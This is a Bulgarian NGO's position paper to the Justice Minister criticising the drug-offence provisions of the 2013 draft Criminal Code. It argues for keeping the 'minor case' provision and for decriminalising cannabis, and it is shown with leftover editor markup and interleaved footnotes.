Становище на Движение Промена относно изготвянето на нов наказателен кодекс

div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;До/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Г-жа Зинаида Златанова/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Министър на правосъдието на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Република България/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Копие до/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Г-жа Вивиан Рединг/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Европейски комисар по правосъдие,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;основни права и гражданство/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;СТАНОВИЩЕ/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;относно проекта за нов Наказателен/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;кодекс, изготвено от „Движение/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Промена“ и подкрепено от „Рестарт/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;– пациенти и експерти за/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;медицински коноп“ и „Медицинска/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;марихуана България“/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Координати за контакт/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Адв. Калин Ангелов/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Ул. Средна гора № 32, ап. 10/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;София, 1303/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;България/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;00359899157031/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;promena@promena.org/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Съдържание и Предложения:/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;1. Искане за удължаване на обществената дискусия по проекта,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;позволяващо сериозното изследване, обмисляне и консултиране на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;проекта във всички негови части (§§ 1-3)/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;2. Кои сме ние? (§§ 4-8)/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;3. Положителни моменти в предложената уредба (§ 9)/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;4. Негативни моменти в предложената уредба (§§10 – 38)/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;a. Премахване на института на маловажния случаи (§§12 – 25)/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;- считаме това за една сериозна крачка назад и/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;настояваме, към момента, уредбата на института на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;„маловажния случай“ за държане на дроги и/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;отглеждане на канабис да не отпада./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;b. Дефиницията „след употреба на наркотично вещество“ (§§ 26 –/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;33)/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;- следва да се преработи дефиницията, като се стесни/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;нейният смислов обхват до състояние „под/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;въздействието на наркотични вещества”, като при/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;всички положения се определят гранични/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;стойности на тяхната концентрация в определена/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;част от човешкия организъм (подобно на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;дефиницията „пияно състояние“)./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;c. Добавяне на ново наказание „Лишаване от право“ (§§ 34 – 38)/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;- наказанието „лишаване от права по чл. 60“ да/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;отпадне напълно като възможност за наказание за/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;престъпленията по чл. 508 – 514 от проекта или да/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;се резервира към конкретни текстове, при които/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;може да има предвидим смисъл./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;5. Възможности за подобрение (§§ 39 – 45)/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;- да се зададе определено ниво на търпимост/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;(декриминализация) спрямо отглеждането и/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;държането на определено количество коноп от/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;пълнолетни лица;/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;- наказателната репресия да бъде насочена най-вече/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;към случаите на значими престъпни групи за/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;производство и разпространение на наркотици,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;както и към изпирането на паричните потоци;/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;- случаите на непълнолетни, задържани с/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наркотични вещества да бъдат ползвани не толкова/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;за наказателна репресия спрямо тях, колкото за/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;разследване на начина, по който наркотичното/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;вещество се е озовало в тях и като възможност за/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;консултация със специалист, който да прецени/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наличието или отсъствието на проблемна употреба./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Уважаема г-жо Министър на правосъдието на Република България,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;1. На 21 декември 2013 година, проектът за нов Наказателен кодекс бе/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;представен за обществено обсъждане на страницата на Министерството на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;правосъдието1 и „Портала за обществени консултации“2. Съгласно/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;информацията, дадена на Портала, консултациите за този проект изтичат/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;на 15.01.2014 г./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;2. Без да влизаме в детайли, в нашето становище се присъединяваме и/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;към останалите участници в дискусията3, които изразяват своето/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;недоумение към факта, че на закон от такава важност, е отделено толкова/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;малко време за обществено обсъждане. Не считаме за сериозно, проект на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;закон от такава обществена значимост, какъвто е Наказателният кодекс на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;една държава, който вероятно ще действа през следващите няколко/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;десетилетия, да бъде подложен на обществено обсъждане в рамките само/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;на три седмици, една от които беше почивна.4/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;3. В този смисъл, първото и най-важно наше предложение към Проекта/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;е:/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Нека да бъде удължен срокът на обществената дискусия по проекта,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;достатъчно, за да може проектът да се изследва, обмисли и консултира./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Кои сме ние и какво пишем?/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;4. Хората и Организациите заставащи зад настоящото становище, са/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;неправителствени организации, експерти, заинтересовани лица,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;занимаващи се, най-общо – с проблемите свързани с дрогите/наркотиците/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;и националната ни политика по отношение на тях./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;5. В този смисъл, анализът в това становище ще засегне основно/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;престъпленията от Раздел ІV на Глава 33 на Особената част от Проекта –/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Престъпления против режима на наркотични вещества, аналози на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;1 http://www.justice.government.bg//div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;2 http://www.strategy.bg//div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;3 Виж коментарите към проекта оставени на публичното обсъждане под публикацията на проекта/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;http://www.strategy.bg/PublicConsultations/View.aspx?lang=bg-BGamp;Id=1139 (последно проверено на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;12.01.2014 г.), както и реакциите на няколко големи неправителствени организации на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;http://judicialreports.bg/2014/01/%D0%BD%D0%B5%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D0/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;%B5%D0%BB%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%B8-/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B8-/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;%D1%81%D1%8A%D0%B4%D0%B8%D0%B8/ (последно проверен на 14.01.2014)./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;4 Отделно, още по-обезпокоителен е фактът, че първоначално, срокът, обявен в сайта, бе до 4.01.2014 г.,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;а в последствие бе сменен на 15.01.2014 г. (виж Приложение № 1 и № 2)/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наркотични вещества и прекурсори (чл. 508 – 514) (по долу: престъпления/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;срещу дрогите)./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;6. Доколкото обаче, някои нови моменти в Общата част и в Дефинициите/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;на Проекта, ще окажат съществено влияние върху правния режим на тези/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;вещества – в анализа си ще се занимаем и с тях./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;7. Методът, по който ще развиваме тезите си ще бъде сравнителен – ще/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;сравняваме действащата понастоящем уредба на Наказателния кодекс от/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;1968 (НК) с предложената по Проекта./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;8. Предвид краткото време, което ни бе дадено, съзнаваме, че няма да/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;можем да обхванем изцяло проблематиката, но се надяваме през/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;следващите месеци на обществена дискусия, да можем да доразвием/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;настоящото си становище и да повлияем положително на националната/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;политика по отношение на дрогите./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Положителни моменти в предложената уредба./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;9. В предложения проект, съществуват поне два положителни момента в/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;сравнение с настоящата уредба:/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;9.1 Престъпленията срещу дрогите са отделени в самостоятелен раздел./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Те вече не съставляват престъпления срещу общественото здраве, които в/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;проекта са уредени в предходния раздел ІІІ на глава 33./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Това отделяне несъмнено е честно, доколкото отразява техния силно/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;формален характер. Рядко някое конкретно престъпление, свързано с/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;дрогите, засяга пряко общественото здраве; много по-често самите/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;престъпления са следствие от проблеми в общественото здравеопазване./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Тук трябва да се отчете и фактът, че в най-голям процент от случаите,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;когато се прилага наказателна репресия спрямо дрогите, а именно при/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наказателно преследване за държане на Коноп/Марихуана – няма сериозен/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;проблем, свързан със здравето или здравеопазването.5/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;5 Виж предложението за Национална стратегия за борба с наркотиците 2014 – 2018/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;https://drive.google.com/file/d/0Bw3ytRsG-LeDVFVxanpzM01yN28/edit?usp=sharing. Допълнително може/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;да се вземат предвид и изпратените към нея становища на „Движение Промена” на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;https://drive.google.com/file/d/0Bw3ytRsG-LeDSHdjS2I1clppbU0/edit?usp=sharing, както и на Сдружение/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;„Проект Пеперуда“, АРЗ „Солидарност“, Фондация „Хоризонти 21“, Фондация „Инициатива за здраве“ на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;http://www.policyzone.info/docs/%D0%B1%D1%8A%D0%BB%D0%B3%D0%B0%D1%80%D1%81%D0%BA%D0/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;%B8/%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%B8%D1%89%D0%B5-/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;%D0%BE%D1%82%D0%BD%D0%BE%D1%81%D0%BD%D0%BE9.2/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Вторият положителен момент е разграничаването, което се прави/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;между производството на растения (чл. 508 ал. 1 от Проекта) и/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;производството на наркотично вещество (чл. 509 ал. 1 от Проекта), като/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;първото е квалифицирано като по-леко от второто./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Въпреки общия си текст, чл. 508 ал. 1 несъмнено се отнася за растението/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Коноп. Това е така, защото отглеждането на други растения, „които са/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наркотични вещества“ (опиев мак, кокаинов храст и др.) е изключителна/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;рядкост в съдебната ни практика.6 Това отделяне на производството на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Коноп от всички останали дроги е нещо, към което сме призовавали от/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;много години и което несъмнено отразява по-правилно обществената му/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;опасност, и с което проектът прави несъмнена крачка напред./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Негативни моменти в предложената нова уредба/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;10. Със съжаление следва да отбележим, че негативните моменти в/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Проекта са значително повече. С него се правят съществени крачки назад,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;към уредбата от преди измененията в НК с ДВ бр. 75/2006. Тази уредба, в/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;годините на своето действие, показа единствено и само негативи –/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;съдилища бяха задръстени с дела за минимални количества наркотични/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;вещества; осъдителни присъди, правещи дейците повече жертви на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;правосъдието, отколкото престъпници; некачествено законодателство,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;което принуждаваше съда, за да спасява съдбите на нещастници, изправени/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;пред него, да прилага без оглед, правилата на чл. 55 от НК, падайки под/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;предвидения минимум, като правило, а не като изключение.7/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;11. Допълнителен проблем е, че за тези съществени изменения на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;уредбата, които се предлагат в Проекта, мотивите мълчат. Ние сме оставени/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;пред чуденето, дали те са съзнателно целени от вносителите, или са/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;резултат от тяхното недоглеждане и пропуски./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;Премахване на института на „маловажния случай“/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;12. Най-сериозна промяна, спрямо настоящата уредба, виждаме в/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;премахването на института на „маловажния случай“. В предложения проект/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82-%D0%B7%D0%B0-/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;%D0%BD%D0%B0%D1%86%D0%B8%D0%BE%D0%BD%D0%B0%D0%BB/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;6 Изследването на съдебната практика не показа нито едно съдебно решение или присъда, които да се/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;занимават с отглеждането на опиев мак или кокаинов храст/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;7 По сполучливият израз, който циркулираше тогава, съдът правеше „превенция от закона“./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;липсват текстове аналогични на настоящите чл. 354а ал. 5 и чл. 354в ал. 5/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;НК/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;13. Съгласно тях, при маловажни случаи на придобиване и държане на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наркотични вещества, както и на засяване и отглеждане на растения от/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;вида на конопа (без разпространение), наказанията са глоба/лишаване от/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;свобода до 1 година. Това от своя страна позволява приложението на/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;института на „Освобождаването от наказателна отговорност с налагане/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;на административно наказание“ (чл. 78а НК). Една немалка част от делата/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;срещу дрогите днес, се водят точно по този ред./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;14. Донякъде това е справедливо. Има хиляди ситуации на хора8,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;заловени с минимални количества канабис, с добро социално положение,/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;най-вече младежи, нерядко студенти. Настоящата уредба позволява/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;наказателната репресия да не бъде прекомерна и да не се дамгосват едва/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;навлизащите в живота хора с печата „Осъждан“ в свидетелството за/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;съдимост./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;15. Допълнително, настоящата уредба позволява и „излизането“ от/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;регистрите на така проблемната напоследък „полицейска регистрация“ и/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;„избягването“ от излишното стоене в информационна база-данни, която/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;през последните години минаваше през ръцете на не един и двама, доста/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;спорни, вътрешни министри9./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;16. Допълнително, производството по освобождаване от наказателна/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;отговорност уредено в НПК (глава 28) е сравнително леко и безпроблемно;/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;често се решава без забавяне, в рамките на едно съдебно заседание. Това/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;спестява разходи във време и средства на съдебната система и полицията и/div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;ги освобождава, за да бъдат насочени за ползване по-рационално./div
div id=_mcePaste style=position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow: hidden;17. Допълнително, отпадането на маловажността влияе пряко и на/div
